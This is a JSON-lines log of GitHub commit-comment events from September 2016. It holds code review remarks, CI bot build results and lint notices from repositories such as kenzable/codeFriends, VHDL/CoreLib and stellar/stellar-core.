{"id":"4570944584","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19045124,"position":null,"line":null,"path":null,"commit_id":"091f7fcdf0d3cae8569b414d7722966b44c316b1","created_at":"2016-09-15T21:45:11Z","updated_at":"2016-09-15T21:45:11Z","body":"stellar/stellar-core/dm/man = 091f7fcd merged ok, testing candidate = 8a39e3f7"}},"created_at":"2016-09-15T21:45:11Z"}
{"id":"4570946493","type":"CommitCommentEvent","actor":{"login":"WaffleTard"},"repo":{"name":"melpa/melpa"},"payload":{"comment":{"id":19045128,"position":1,"line":1,"path":"recipes/aa-edit-mode","commit_id":"6b5791b05656ddb67cc69c0c7c4179adde1f986f","created_at":"2016-09-15T21:45:32Z","updated_at":"2016-09-15T21:45:32Z","body":"\"Null\"_github"}},"created_at":"2016-09-15T21:45:32Z"}
{"id":"4570951968","type":"CommitCommentEvent","actor":{"login":"marimysh"},"repo":{"name":"Komaric/BirthdayReminder"},"payload":{"comment":{"id":19045140,"position":3,"line":3,"path":"app/src/main/java/ru/komaric/birthdayreminder/util/Pair.java","commit_id":"767732e9d41de6021cf5362c90ac7efecc539411","created_at":"2016-09-15T21:46:40Z","updated_at":"2016-09-15T21:46:40Z","body":"а в чем в принципе смысл этого класса? разве нет готового похожего в джаве?"}},"created_at":"2016-09-15T21:46:40Z"}
{"id":"4570952002","type":"CommitCommentEvent","actor":{"login":"crazile"},"repo":{"name":"crazile/postcss-functions"},"payload":{"comment":{"id":19045141,"position":10,"line":13,"path":"index.js","commit_id":"5d876cc997b67e0346fd11e7045031182cbc27b6","created_at":"2016-09-15T21:46:41Z","updated_at":"2016-09-15T21:46:41Z","body":"Hi @andyjansson, I was trying to stick close to the behaviour of [Promise.resolve()](https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/Promise/resolve) which checks If the value is a thenable (i.e. has a \"then\" method) rather than an instance of Promise.\r\n\r\nI'd guess this is because there are a large number of Promise libraries, pollyfills and custom implementations which may return a promise-like object which is not actually an instance of Promise."}},"created_at":"2016-09-15T21:46:41Z"}
{"id":"4570956072","type":"CommitCommentEvent","actor":{"login":"WaffleTard"},"repo":{"name":"melpa/melpa"},"payload":{"comment":{"id":19045156,"position":1,"line":1,"path":"recipes/.dir-locals.el","commit_id":"ae51a19479161a1ff0488948cdbe643a875454d2","created_at":"2016-09-15T21:47:34Z","updated_at":"2016-09-15T21:47:34Z","body":"\"Null\"_line-1"}},"created_at":"2016-09-15T21:47:34Z"}
{"id":"4570958040","type":"CommitCommentEvent","actor":{"login":"marimysh"},"repo":{"name":"Komaric/BirthdayReminder"},"payload":{"comment":{"id":19045166,"position":17,"line":17,"path":"app/src/main/java/ru/komaric/birthdayreminder/util/Util.java","commit_id":"767732e9d41de6021cf5362c90ac7efecc539411","created_at":"2016-09-15T21:47:57Z","updated_at":"2016-09-15T21:47:57Z","body":"Избыточно. Выше уже описано это же условие"}},"created_at":"2016-09-15T21:47:57Z"}
{"id":"4570958075","type":"CommitCommentEvent","actor":{"login":"tommytn"},"repo":{"name":"tommytn/windows-itpro-docs"},"payload":{"comment":{"id":19045167,"position":null,"line":null,"path":null,"commit_id":"909a4d90b0a7f5f00b6a3991b565c8c3233ad885","created_at":"2016-09-15T21:47:57Z","updated_at":"2016-09-15T21:47:57Z","body":"registering***\r\n\r\ncan you please fix and commit?"}},"created_at":"2016-09-15T21:47:57Z"}
{"id":"4570961191","type":"CommitCommentEvent","actor":{"login":"WaffleTard"},"repo":{"name":"melpa/melpa"},"payload":{"comment":{"id":19045177,"position":4,"line":3,"path":"recipes/.dir-locals.el","commit_id":"ae51a19479161a1ff0488948cdbe643a875454d2","created_at":"2016-09-15T21:48:37Z","updated_at":"2016-09-15T21:48:37Z","body":"(((\"Null\"_disabled)))"}},"created_at":"2016-09-15T21:48:37Z"}
{"id":"4570961874","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045179,"position":null,"line":null,"path":null,"commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T21:48:44Z","updated_at":"2016-09-15T21:48:44Z","body":"Bootstrap: instead of including the flat js/css files as static assets, consider using Bower and/or npm.\r\n\r\nJQuery: same as Bootstrap.\r\n\r\nStatic assets: remove from public, public is supposed to be `gitignored` — and add to `browser`."}},"created_at":"2016-09-15T21:48:44Z"}
{"id":"4570963457","type":"CommitCommentEvent","actor":{"login":"marimysh"},"repo":{"name":"Komaric/BirthdayReminder"},"payload":{"comment":{"id":19045189,"position":53,"line":53,"path":"app/src/main/java/ru/komaric/birthdayreminder/util/Util.java","commit_id":"767732e9d41de6021cf5362c90ac7efecc539411","created_at":"2016-09-15T21:49:06Z","updated_at":"2016-09-15T21:49:06Z","body":"И снова константа"}},"created_at":"2016-09-15T21:49:06Z"}
{"id":"4570964176","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045195,"position":null,"line":null,"path":null,"commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T21:49:15Z","updated_at":"2016-09-15T21:49:15Z","body":"45 Linter warnings.\r\n\r\n![bitmoji](https://render.bitstrips.com/v2/cpanel/10212032-122921288_15-s1-v1.png?transparent=1&width=246)"}},"created_at":"2016-09-15T21:49:15Z"}
{"id":"4570964809","type":"CommitCommentEvent","actor":{"login":"ananavati"},"repo":{"name":"caoyangs/docs"},"payload":{"comment":{"id":19045198,"position":16,"line":16,"path":"electrode/content.md","commit_id":"9d7c9a5a6a78d07591c8bf896ca601a19403cd8c","created_at":"2016-09-15T21:49:22Z","updated_at":"2016-09-15T21:49:22Z","body":"`caoyang/electrode` will be `electrode/electrode-io` right?"}},"created_at":"2016-09-15T21:49:22Z"}
{"id":"4570965764","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045203,"position":null,"line":null,"path":null,"commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T21:49:36Z","updated_at":"2016-09-15T21:49:36Z","body":"Some tests are broken / failing.\r\n\r\n![bitmoji](https://render.bitstrips.com/v2/cpanel/10079856-122921288_15-s1-v1.png?transparent=1&width=246)"}},"created_at":"2016-09-15T21:49:36Z"}
{"id":"4570966751","type":"CommitCommentEvent","actor":{"login":"ananavati"},"repo":{"name":"caoyangs/docs"},"payload":{"comment":{"id":19045207,"position":12,"line":12,"path":"electrode/content.md","commit_id":"9d7c9a5a6a78d07591c8bf896ca601a19403cd8c","created_at":"2016-09-15T21:49:48Z","updated_at":"2016-09-15T21:49:48Z","body":"mention how to pull this image `docker pull electrode/electrode-io`"}},"created_at":"2016-09-15T21:49:48Z"}
{"id":"4570968670","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19045210,"position":null,"line":null,"path":null,"commit_id":"a07d282b31be1d17f4fba6b65aadc7862cf9db41","created_at":"2016-09-15T21:50:13Z","updated_at":"2016-09-15T21:50:13Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 2472 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a07d282b31be1d17f4fba6b65aadc7862cf9db41-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a07d282b31be1d17f4fba6b65aadc7862cf9db41-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-0.0%25-red.svg)</a> \n"}},"created_at":"2016-09-15T21:50:13Z"}
{"id":"4570971498","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045218,"position":8,"line":8,"path":"server/app/routes/cart.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T21:50:48Z","updated_at":"2016-09-15T21:50:48Z","body":"`findById`"}},"created_at":"2016-09-15T21:50:48Z"}
{"id":"4570975297","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045235,"position":12,"line":12,"path":"server/app/routes/cart.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T21:51:37Z","updated_at":"2016-09-15T21:51:37Z","body":"Whoah what? You want to delete the cart from the db if you find it? O_O"}},"created_at":"2016-09-15T21:51:37Z"}
{"id":"4570975660","type":"CommitCommentEvent","actor":{"login":"caoyangs"},"repo":{"name":"caoyangs/docs"},"payload":{"comment":{"id":19045237,"position":12,"line":12,"path":"electrode/content.md","commit_id":"9d7c9a5a6a78d07591c8bf896ca601a19403cd8c","created_at":"2016-09-15T21:51:41Z","updated_at":"2016-09-15T21:51:41Z","body":"https://hub.docker.com/_/redis/ it will be on the right hand side of their website"}},"created_at":"2016-09-15T21:51:41Z"}
{"id":"4570977210","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045241,"position":11,"line":11,"path":"server/app/routes/cart.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T21:52:00Z","updated_at":"2016-09-15T21:52:00Z","body":"why only the `items`?"}},"created_at":"2016-09-15T21:52:00Z"}
{"id":"4570978788","type":"CommitCommentEvent","actor":{"login":"kimber-no-ly"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045247,"position":11,"line":11,"path":"server/db/index.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T21:52:18Z","updated_at":"2016-09-15T21:52:18Z","body":"can also require using `var Foo = db.model('foo');` syntax"}},"created_at":"2016-09-15T21:52:18Z"}
{"id":"4570978999","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045248,"position":22,"line":22,"path":"server/app/routes/cart.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T21:52:21Z","updated_at":"2016-09-15T21:52:21Z","body":"neat!"}},"created_at":"2016-09-15T21:52:21Z"}
{"id":"4570981659","type":"CommitCommentEvent","actor":{"login":"LarsAsplund"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19045253,"position":6,"line":33,"path":"src/math.vhdl","commit_id":"10eb07b7dd2e56a8fe88c75df39d57a4cb76c71a","created_at":"2016-09-15T21:52:54Z","updated_at":"2016-09-15T21:52:54Z","body":"* I think just `square` (common name for this function) or `squareOf` (which reads nicely in expressions)  would be better names\r\n* Why is negative inputs not allowed?\r\n* Regardless of input type it should have an restricted range to fit within the range of the output"}},"created_at":"2016-09-15T21:52:54Z"}
{"id":"4570982259","type":"CommitCommentEvent","actor":{"login":"aaronschachter"},"repo":{"name":"DoSomething/northstar-js"},"payload":{"comment":{"id":19045254,"position":27,"line":27,"path":"lib/northstar-endpoint-users.js","commit_id":"3b43b743a5f4d441192f97e5c420f756f06e9e2a","created_at":"2016-09-15T21:53:02Z","updated_at":"2016-09-15T21:53:02Z","body":"this.executeGet is not a function"}},"created_at":"2016-09-15T21:53:02Z"}
{"id":"4570984143","type":"CommitCommentEvent","actor":{"login":"LarsAsplund"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19045260,"position":7,"line":34,"path":"src/math.vhdl","commit_id":"10eb07b7dd2e56a8fe88c75df39d57a4cb76c71a","created_at":"2016-09-15T21:53:25Z","updated_at":"2016-09-15T21:53:25Z","body":"Same comment as above but `cube` or `cubeOf` instead"}},"created_at":"2016-09-15T21:53:25Z"}
{"id":"4570991085","type":"CommitCommentEvent","actor":{"login":"kimber-no-ly"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045278,"position":18,"line":18,"path":"server/db/index.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T21:54:56Z","updated_at":"2016-09-15T21:54:56Z","body":"How are we associating friends to a cart or order?"}},"created_at":"2016-09-15T21:54:56Z"}
{"id":"4570994714","type":"CommitCommentEvent","actor":{"login":"jeremylong"},"repo":{"name":"jeremylong/DependencyCheck"},"payload":{"comment":{"id":19045282,"position":null,"line":null,"path":null,"commit_id":"19243c479c91970e85e673b5674768fa26f00df4","created_at":"2016-09-15T21:55:42Z","updated_at":"2016-09-15T21:55:42Z","body":"I haven't heard of performance issues with Mariadb. Is anyone experiencing the problem?"}},"created_at":"2016-09-15T21:55:42Z"}
{"id":"4570994804","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045284,"position":7,"line":7,"path":"server/app/routes/cart.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T21:55:43Z","updated_at":"2016-09-15T21:55:43Z","body":"This is \"get all carts\" but the function body gets all carts for a single user. That should be something like `GET /users/123/carts` or `GET /carts?userId=123`."}},"created_at":"2016-09-15T21:55:43Z"}
{"id":"4570997888","type":"CommitCommentEvent","actor":{"login":"LarsAsplund"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19045296,"position":6,"line":38,"path":"tb/vunit/math_tb.vhdl","commit_id":"bc9adb048fbf9ecca17cb01d0a34188d3893d58a","created_at":"2016-09-15T21:56:21Z","updated_at":"2016-09-15T21:56:21Z","body":"We should use spaces and not tabs if the code is going to work with peoples editors. Number of spaces for indentation is a separate question but personally I use 2."}},"created_at":"2016-09-15T21:56:21Z"}
{"id":"4570999452","type":"CommitCommentEvent","actor":{"login":"jarulraj"},"repo":{"name":"cmu-db/peloton"},"payload":{"comment":{"id":19045300,"position":7,"line":7,"path":"script/coding_style.md","commit_id":"fef470f55853e0a743f5cb39de82418b049b24fe","created_at":"2016-09-15T21:56:40Z","updated_at":"2016-09-15T21:56:40Z","body":"It looks like that in our clang-format file. https://github.com/cmu-db/peloton/blob/master/.clang-format"}},"created_at":"2016-09-15T21:56:40Z"}
{"id":"4570999965","type":"CommitCommentEvent","actor":{"login":"ananavati"},"repo":{"name":"caoyangs/docs"},"payload":{"comment":{"id":19045302,"position":null,"line":null,"path":null,"commit_id":"a588c4141eb68edc0230810fec4f8ef6e0157a75","created_at":"2016-09-15T21:56:46Z","updated_at":"2016-09-15T21:56:46Z","body":"how do we update the docker image with changes in `electrode-boilerplate-universal-react-node`"}},"created_at":"2016-09-15T21:56:46Z"}
{"id":"4571009183","type":"CommitCommentEvent","actor":{"login":"kimber-no-ly"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045327,"position":21,"line":21,"path":"server/db/models/feedback.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T21:58:44Z","updated_at":"2016-09-15T21:58:44Z","body":"why `findAndCountAll` instead of `findAll`?"}},"created_at":"2016-09-15T21:58:44Z"}
{"id":"4571009881","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19045330,"position":null,"line":null,"path":null,"commit_id":"7a33b0d245941f8be398e9155ffafa444fc4bdbc","created_at":"2016-09-15T21:58:52Z","updated_at":"2016-09-15T21:58:52Z","body":"[R/ABC_SMC.R:319:6:](https://github.com/richelbilderbeek/nLTT/blob/7a33b0d245941f8be398e9155ffafa444fc4bdbc/R/ABC_SMC.R#L319) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(j in seq_along(parameters)) {\n     ^\n```"}},"created_at":"2016-09-15T21:58:52Z"}
{"id":"4571010878","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045332,"position":30,"line":30,"path":"server/app/routes/cart.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T21:59:06Z","updated_at":"2016-09-15T21:59:06Z","body":"This is more in line with RPC (Remote Procedure Call) than REST (Representation State Transfer) — you're asking the server to perform a function instead of transmitting some data that should update the application state. We recommend sticking more to the latter approach, which in general leads to a clearer API and less spaghetti code.\r\n\r\nIf you want to trigger an order going through, that might be something like posting to an order API."}},"created_at":"2016-09-15T21:59:06Z"}
{"id":"4571010961","type":"CommitCommentEvent","actor":{"login":"sapitts"},"repo":{"name":"sapitts/moose"},"payload":{"comment":{"id":19045334,"position":36,"line":49,"path":"modules/tensor_mechanics/src/materials/ComputeFiniteStrainElasticStress.C","commit_id":"7c68d2473be3088bf9659af2e0fc45f3e9b5b0e1","created_at":"2016-09-15T21:59:07Z","updated_at":"2016-09-15T21:59:07Z","body":"@cpritam and @jasondhales, I've chased down the error with the three-point bending problem to an issue with the rotations: the strain increment is not rotated when it is used to calculate the stress, therefore the old strain increment is not equal to the old strain in TimeStep 3.  The code shown above will give the same values for the old stress value in the third time step but will show relative differences in the stress on the order of 1e-4 in TimeStep 4.  Do either of you have advice on how I should proceed? "}},"created_at":"2016-09-15T21:59:07Z"}
{"id":"4571013188","type":"CommitCommentEvent","actor":{"login":"RoboMWM"},"repo":{"name":"MCShovel/GriefPrevention"},"payload":{"comment":{"id":19045345,"position":26,"line":448,"path":"src/me/ryanhamshire/GriefPrevention/BlockEventHandler.java","commit_id":"800f0d76d8b786bb1491c139885a71aaf82a8ac1","created_at":"2016-09-15T21:59:35Z","updated_at":"2016-09-15T21:59:35Z","body":"Is that so?"}},"created_at":"2016-09-15T21:59:35Z"}
{"id":"4571013803","type":"CommitCommentEvent","actor":{"login":"LarsAsplund"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19045347,"position":25,"line":51,"path":"tb/vunit/math_tb.vhdl","commit_id":"bc9adb048fbf9ecca17cb01d0a34188d3893d58a","created_at":"2016-09-15T21:59:42Z","updated_at":"2016-09-15T21:59:42Z","body":"Use `check_equal(squareNumber(i), i*i);` for better error messages"}},"created_at":"2016-09-15T21:59:42Z"}
{"id":"4571014654","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045348,"position":33,"line":33,"path":"server/app/routes/cart.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T21:59:54Z","updated_at":"2016-09-15T21:59:54Z","body":"Nifty!"}},"created_at":"2016-09-15T21:59:54Z"}
{"id":"4571015017","type":"CommitCommentEvent","actor":{"login":"fplanque"},"repo":{"name":"b2evolution/b2evolution"},"payload":{"comment":{"id":19045352,"position":63,"line":414,"path":"install/index.php","commit_id":"c5d17d0842ed0e7a14594aa0e4d78e1a7458e47b","created_at":"2016-09-15T21:59:59Z","updated_at":"2016-09-15T21:59:59Z","body":"wtf?"}},"created_at":"2016-09-15T21:59:59Z"}
{"id":"4571018589","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045364,"position":49,"line":49,"path":"server/app/routes/cart.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:00:41Z","updated_at":"2016-09-15T22:00:41Z","body":"This long promise chain probably could be abstracted out into some kind of instance / class method on the Order / Cart / Friend model. That would make your routing logic much clearer."}},"created_at":"2016-09-15T22:00:41Z"}
{"id":"4571025283","type":"CommitCommentEvent","actor":{"login":"Pranoydll"},"repo":{"name":"TheOverlord23/Fowler-Tech-Club-Web-Site"},"payload":{"comment":{"id":19045377,"position":null,"line":null,"path":null,"commit_id":"eba17ed066f326b0b0d02d50c4f48c7871e85419","created_at":"2016-09-15T22:01:59Z","updated_at":"2016-09-15T22:01:59Z","body":"cuz Adam and I made the basic website"}},"created_at":"2016-09-15T22:01:59Z"}
{"id":"4571026584","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045381,"position":15,"line":15,"path":"server/app/routes/feedback.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:02:15Z","updated_at":"2016-09-15T22:02:15Z","body":"In general it's considered good practice to not commit commented-out code — resurrecting old code can always be done by copying it from a previous commit."}},"created_at":"2016-09-15T22:02:15Z"}
{"id":"4571029166","type":"CommitCommentEvent","actor":{"login":"LarsAsplund"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19045391,"position":null,"line":null,"path":null,"commit_id":"bc9adb048fbf9ecca17cb01d0a34188d3893d58a","created_at":"2016-09-15T22:02:49Z","updated_at":"2016-09-15T22:02:49Z","body":"General comments\r\n* We should use spaces and not tabs if the code is going to work with peoples editors. Number of spaces for indentation is a separate question but personally I use 2.\r\n* The `wait` after `test_runner_cleanup` isn't really needed because `test_runner_cleanup` will stop the simulation. However, at least ModelSim will issue a warning if not present.\r\n* The problem with verifying a function with the identical expression in VHDL can be solved by letting Python compute a set of reference data with the help of a `pre_config` function to the test case. That reference data can be save to file and then accessed by the testbench using the VUnit `array_pkg`. I will push an example of this tomorrow "}},"created_at":"2016-09-15T22:02:49Z"}
{"id":"4571030231","type":"CommitCommentEvent","actor":{"login":"gambiteer"},"repo":{"name":"gambit/gambit"},"payload":{"comment":{"id":19045393,"position":null,"line":null,"path":null,"commit_id":"9c5e9dabdf3f3d766dfd2c0e98d459e2e40a1207","created_at":"2016-09-15T22:03:03Z","updated_at":"2016-09-15T22:03:03Z","body":"Marc:  It seems that 'define-prim' wraps routines in '(not inline)', correct?\r\n\r\nIf I just use '(define (##hash-combine ...' then it seems to be inlined in the places it was inlined before.\r\n\r\nWould that be a good solution?\r\n"}},"created_at":"2016-09-15T22:03:03Z"}
{"id":"4571031670","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045401,"position":22,"line":22,"path":"server/app/routes/feedback.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:03:21Z","updated_at":"2016-09-15T22:03:21Z","body":"You're doing a `findById`, it should just be a promise for a user — not an array of user & created. I assume this is a holdover from a `findOrCreate`?"}},"created_at":"2016-09-15T22:03:21Z"}
{"id":"4571032860","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19045407,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-15T22:03:36Z","updated_at":"2016-09-15T22:03:36Z","body":"@LoneGazebo @ilteroi \r\n\r\nHow do we get around something like this...it looks like he's added a few #define headers in  CvGameCoreDLLUtil_Win32Headers.h\r\n\r\n```\r\n#if !defined(MOD_ACTIVE_DIPLOMACY)\r\n#define NOWINMESSAGES    \r\n#endif\r\n```"}},"created_at":"2016-09-15T22:03:36Z"}
{"id":"4571033601","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045410,"position":21,"line":21,"path":"server/app/routes/feedback.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:03:45Z","updated_at":"2016-09-15T22:03:45Z","body":"With `findById` you just pass in the `id`."}},"created_at":"2016-09-15T22:03:45Z"}
{"id":"4571034634","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19045413,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-15T22:03:58Z","updated_at":"2016-09-15T22:03:58Z","body":"I don't know if these things are harmless or what..."}},"created_at":"2016-09-15T22:03:58Z"}
{"id":"4571040238","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19045422,"position":null,"line":null,"path":null,"commit_id":"091f7fcdf0d3cae8569b414d7722966b44c316b1","created_at":"2016-09-15T22:05:12Z","updated_at":"2016-09-15T22:05:12Z","body":"all tests pass:\nsuccess: https://travis-ci.org/stellar/stellar-core/builds/160298463\n"}},"created_at":"2016-09-15T22:05:12Z"}
{"id":"4571042676","type":"CommitCommentEvent","actor":{"login":"mhines-usgs"},"repo":{"name":"USGS-R/repgen"},"payload":{"comment":{"id":19045431,"position":11,"line":125,"path":"R/dvhydrograph-data.R","commit_id":"8510accbf2bbb1f9f2807b35d1460666c411af08","created_at":"2016-09-15T22:05:44Z","updated_at":"2016-09-15T22:05:44Z","body":"Regarding the warning here in Travis or your local Check\r\nCodoc mismatches from documentation object 'extendStep':\r\nextendStep\r\n  Code: function(toPlot)\r\n  Docs: function(toPlot, endDate)\r\n  Argument names in docs not in code:\r\n    endDate\r\n\r\nYou have to re-roxygenize this to get the documentation to match the removal of endDate from this function.\r\n\r\nTo do that, in R-studio console:\r\nlibrary(roxygen2)\r\nroxygen2::roxygenize()\r\n\r\nThat will regen the Rd files and get rid of the warnings/issues in the Check\r\n\r\nBut, it doesn't fail, it's just a warning."}},"created_at":"2016-09-15T22:05:44Z"}
{"id":"4571042788","type":"CommitCommentEvent","actor":{"login":"kimber-no-ly"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045432,"position":22,"line":22,"path":"server/db/models/cart.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:05:45Z","updated_at":"2016-09-15T22:05:45Z","body":"Why are we storing items as JSON instead of making associations?"}},"created_at":"2016-09-15T22:05:45Z"}
{"id":"4571044446","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045439,"position":21,"line":21,"path":"server/app/routes/feedback.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:06:06Z","updated_at":"2016-09-15T22:06:06Z","body":"Also, you don't actually need to look up this user — authenticated users already exist as `req.user`, and you can pass that straight into `setUser` below."}},"created_at":"2016-09-15T22:06:06Z"}
{"id":"4571045093","type":"CommitCommentEvent","actor":{"login":"fincs"},"repo":{"name":"AuroraWright/Luma3DS"},"payload":{"comment":{"id":19045440,"position":24,"line":90,"path":"injector/source/patcher.c","commit_id":"550ea2116e95077f6bdf000358b8b99c39f62a2e","created_at":"2016-09-15T22:06:13Z","updated_at":"2016-09-15T22:06:13Z","body":"Text encoding police here. This 8-bit->16-bit character conversion code is invalid and does not allow the usage of Unicode codepoints above 0xFF, such as symbols, non-Latin writing systems or even [Nintendo's own private-use characters](https://3dbrew.org/wiki/System_Font). It would be best if proper UTF-8->UTF-16 conversion were used instead. [hax 2.x source code](https://github.com/smealum/ninjhax2.x/blob/master/app_code/source/main.c#L419) contains premade functions that implement this."}},"created_at":"2016-09-15T22:06:13Z"}
{"id":"4571045898","type":"CommitCommentEvent","actor":{"login":"Paebbels"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19045443,"position":6,"line":33,"path":"src/math.vhdl","commit_id":"10eb07b7dd2e56a8fe88c75df39d57a4cb76c71a","created_at":"2016-09-15T22:06:24Z","updated_at":"2016-09-15T22:06:24Z","body":"Originally, I wrote the `triangularNumber` function. Then I was looking for other mathematical or [figurative numbers](https://en.wikipedia.org/wiki/Category:Figurate_numbers) or named numbers, which might be use full for a package. I found square and cubic number. So the naming is not inspired by the mathematical function (N**2), but by the name of the resulting number. A common `square` or `sqr` or even `pow` function is not required, because VHDL knows `**` as an operator.\r\n\r\nOther numbers:\r\n* https://en.wikipedia.org/wiki/Tetrahedral_number\r\n* https://en.wikipedia.org/wiki/Pentatope_number\r\n\r\nOh there is even a long list in the english wikipedia: https://en.wikipedia.org/wiki/Category:Figurate_numbers\r\n\r\nI started my package with 3 numbers, because these are often used to describe regular hardware structures."}},"created_at":"2016-09-15T22:06:24Z"}
{"id":"4571047742","type":"CommitCommentEvent","actor":{"login":"nicolas-cellier-aka-nice"},"repo":{"name":"LHEEA/HOS-ocean"},"payload":{"comment":{"id":19045448,"position":189,"line":287,"path":"sources/utilities/maths.f90","commit_id":"e34e5603500404c191a6b9662b3af792d9462ce3","created_at":"2016-09-15T22:06:37Z","updated_at":"2016-09-15T22:06:37Z","body":"I wonder why not just using `atan2(aimag(z),real(z))`?\r\nResult would be in (-pi,pi), but is it that important?\r\nHard to tell because phase(z) seems unused in this project..."}},"created_at":"2016-09-15T22:06:37Z"}
{"id":"4571048543","type":"CommitCommentEvent","actor":{"login":"kimber-no-ly"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045450,"position":18,"line":18,"path":"server/db/index.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:06:46Z","updated_at":"2016-09-15T22:06:46Z","body":"Oh, nvm, I see. I revise to why not associate friends to a cart or order?"}},"created_at":"2016-09-15T22:06:46Z"}
{"id":"4571052025","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045462,"position":14,"line":14,"path":"server/app/routes/friends.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:07:33Z","updated_at":"2016-09-15T22:07:33Z","body":"I think this will always be an array, even an empty array, in which case this `if` will always pass."}},"created_at":"2016-09-15T22:07:33Z"}
